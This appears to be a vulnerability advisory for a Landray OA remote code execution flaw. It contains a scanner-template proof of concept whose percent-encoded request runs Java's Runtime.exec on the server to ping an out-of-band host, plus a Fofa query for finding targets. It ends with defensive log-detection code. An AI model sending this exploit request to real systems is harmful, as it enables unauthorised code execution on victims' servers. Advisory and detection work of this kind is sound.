landray-oa-datajson-rce: Landray OA Datajson RCE

Date: 2025-09-01 | Affected software: Landray OA | POC: Public

Vulnerability description

A vulnerability in Landray Office Automation (OA) software, specifically in the "sysFormulaSimulateByJS" functionality of the "s_bean" component, allows remote code execution (RCE), enabling attackers to execute arbitrary code on a target system. Fofa: app="Landray-OA系统"

PoC code [public]

id: landray-oa-datajson-rce

info:
  name: Landray OA Datajson RCE
  author: xpoc
  severity: critical
  verified: true
  description: |
    Landray Office Automation (OA) software, specifically in the "s_bean" component's "sysFormulaSimulateByJS" functionality. This vulnerability allows remote code execution (RCE), enabling attackers to execute arbitrary code on a target system.
    Fofa: app="Landray-OA系统"
  reference:
    - https://github.com/k3sc/Landray-oa-rce-1/blob/main/poc.py
    - https://github.com/hktalent/scan4all/blob/main/pocs_go/landray/Landray_RCE.go
    - https://github.com/zan8in/afrog/v3/blob/main/v2/pocs/afrog-pocs/vulnerability/landray-oa-datajson-rce.yaml
  tags: landray,rce
  created: 2023/06/22

set:
  oob: oob()
  oobHTTP: oob.HTTP
  oobDNS: oob.DNS
rules:
  r0:
    request:
      method: GET
      path: /data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=%66%75%6e%63%74%69%6f%6e%20%74%65%73%74%28%29%7b%20%72%65%74%75%72%6e%20%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%7d%3b%72%3d%74%65%73%74%28%29%3b%72%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%70%69%6e%67%20%2d%63%20%34%20{{oobDNS}}%22%29&type=1
    expression: oobCheck(oob, oob.ProtocolDNS, 3)
  # r2:
  #   request:
  #     method: GET
  #     path: /data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=function test(){ return java.lang.Runtime};r=test();r.getRuntime().exec("ping {{oobDNS}}")&type=1
  #   expression: oobCheck(oob, oob.ProtocolDNS, 3)
expression: r0() # || r2()
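
For defenders, the request in rule r0 can be spotted in web access logs even though every character of the script parameter is percent-encoded. The following is an added example, not part of the original PoC or of any project referenced above: it assumes combined-format access logs, and the marker list, function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

ENDPOINT = "/data/sys-common/datajson.js"
BEAN = "sysformulasimulatebyjs"
# Markers of Java process execution inside a script value (assumed list, extend as needed)
SUSPICIOUS = re.compile(r"java\.lang|getRuntime|\.exec\s*\(|ProcessBuilder", re.I)
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def full_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded values are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return 'exploit', 'probe' or None for one access log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if full_decode(parts.path).lower() != ENDPOINT:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes once
    beans = [full_decode(v).lower() for v in params.get("s_bean", [])]
    if BEAN not in beans:
        return None
    scripts = [full_decode(v) for v in params.get("script", [])]
    # Any call to this bean deserves review; Java markers raise the verdict
    return "exploit" if any(SUSPICIOUS.search(s) for s in scripts) else "probe"

def pct(text):
    """Percent-encode every byte, as the PoC request does."""
    return "".join("%%%02x" % b for b in text.encode())

# Constructed sample input: the script value is a fragment of the commented-out rule above
SAMPLE_SCRIPT = "function test(){ return java.lang.Runtime}"
BASE = "/data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script="
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Sep/2025:10:00:00 +0000] "GET ' + BASE + pct(SAMPLE_SCRIPT) + '&type=1 HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Sep/2025:10:00:05 +0000] "GET ' + BASE + '1%2B1&type=1 HTTP/1.1" 200 20',
    '192.0.2.9 - - [01/Sep/2025:10:00:09 +0000] "GET /index.jsp HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(classify(entry), entry[:60])
```

Matching on the decoded value matters here: a signature written against the literal string java.lang.Runtime never fires on the fully percent-encoded form used in r0.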
